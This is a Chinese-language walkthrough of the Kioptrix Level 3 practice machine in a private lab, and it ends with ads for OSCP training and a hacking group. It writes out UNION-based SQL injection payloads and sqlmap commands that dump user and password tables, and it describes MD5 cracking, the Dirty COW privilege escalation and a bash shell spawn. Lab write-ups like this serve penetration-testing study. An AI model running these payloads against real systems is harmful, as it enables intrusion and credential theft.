Kioptrix-Level Three 思路整理

基本信息

• 基本信息攻击机:192.168.38.128；靶机:192.168.38.132

web样式无法显示的问题

• 原因：样式是以这个域名为基准链接的，而这个域名解析其实要到本地靶机的地址的。
• 修改hosts文件，将这个域名指向靶机地址，然后刷新一下就可以正常显示了。

echo"192.168.38.132 kioptrix3.com" >>/etc/hosts

信息收集

dirb目录扫描

dirsearch目录扫描

whatweb指纹

nmap服务扫描

• 只有80和22端口开放的

主机详细信息

• 操作系统：Ubuntu Liunx
• 内核版本：Linux 2.6.9 - 2.6.33

查找攻击点

Web服务|80

• 三个页面返回404，now进入到另一个目录的页面。

• 不同照片跳转不同路径的页面
• 照片页面有传参，后续尝试抓包测试

参数测试

• 参数对应，除了能改评分多少似乎没任何作用，阿巴阿巴。。。
• 只能改一次！给了个50分。

针对路径扫描

• 针对/gallery/路径重新扫描一遍，有时候会遗漏掉一些敏感文件或路径。
• 数据库文件，暂时先留着。
• 照片管理后台和泄露的版本文件。尝试万能密码无效果。
• 发现页面存在SQL注入，根据后台版本去查找poc刚好也指向这个页面

SQL手动测试

• order by根据第七个字段进行排序的时候报错了，证明只有六个字段

id=1 order by 6 -- 

• 联合查询六个字段，只显示查询的2，3字段，判断出显错点为2，3。

1 union select1,2,3,4,5,6-- 

• 根据已知的显错点，将字段查询改为数据库查询。得知数据库为gallery

1 union select1,2,database(),4,5,6-- 

• 查询gallery数据库中含有的表

1 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema="gallery" -- 

• 注意到有个users表，查询他表的字段,注意到有用户名和密码字段

1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name="gallarific_users" -- 

• 查询表中用户名和密码字段的数据

1 union select 1,group_concat(username),group_concat(password),4,5,6 from gallarific_users

• 不过这个是博客后台的登录密码，回到了之前发现的后台页面登录进去，尝试文件上传，无效果。
• 继续查询，注意到一可疑的dev_accounts。查询字段

1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name="dev_accounts"

• 查询表中的数据

1 union select 1,group_concat(username),group_concat(password),4,5,6 from dev_accounts

• 通过MD5解密得知用户对应的密码，解密的网站：MD5在线解密原理其实和碰撞一样，不过碰撞需要时间。而他有数据库记录了一些常见的。

sqlmap|工具注入

#获取当前数据库sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch --current-db#查询数据库中的表sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery -tables#获取表的数据sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery -T gallarific_users,dev_accounts --dump

用户提权|方法一

• 尝试SSH登录两个账户需要指定密钥，权限等级都为普通权限

ssh -oHostKeyAlgorithms=+ssh-rsa [email protected]

• 查看系统内核架构和版本
• 查找poc，ubuntu下没可用poc内核需要进一步使用。
• -m复制到当前目录利用python的http服务上传上去。漏洞名字为：Dirty COW
• 根据exp提示输入新密码，然后等待一段是时间就创建出一个新的用户和密码。
• 使用新用户和密码登录，直接是管理员权限了。

• 一个phpmyadmin登录页面。
• 用户名使他闭合成功登录进去，不过看了看只能看到表的结构看不到内容
• whatweb获取指纹的版本信息，查找poc，未发现可留用点。
• 管理系统的安装，不过没密码，尝试万能密码没效果。尝试使用上一个目录的密码也无效果。

• 通过探索发现存在两个传参测试能爆出路径，不过不是伪协议。
• 在登录页面测试，不存在sql注入，注意到下面有个技术支持的，这个在信息收集中很重要。
• 查找相关的poc，发现存在历史漏洞，不过第一个要用msf掠过先去看第二个多个漏洞的poc
• 只存在XSS和CSRF打靶机时没作用。。。。
• 查找到一个远程命令执行exp，git下载测试并执行。exp地址：地址
• 最近刚学到的一个方式来执行bash，通过python来创建一个提示python -c 'import pty;pty.spawn("/bin/bash")'
• 获取系统信息
• 使用exp获取，和上一个方法一样提权。
• 登录提权成功

附录

OSCP培训

学习没思路？安全不知道怎么学习的朋友可以了解一下OSCP证书课程一次报名后续相关的课程都免费哦，咨询也不吃亏。实在不放心还可以关注公众看一下我们零开始到红队的公益课程不含任何费用公众号

帮会

也可以了解一下我们帮会，是真正的红队大佬创建的，里面会定时丢些网上没有的工具。以及文章中包含的所有工具

聊天群聊

加入群聊一起交流学习，有什么疑问可以一起交流。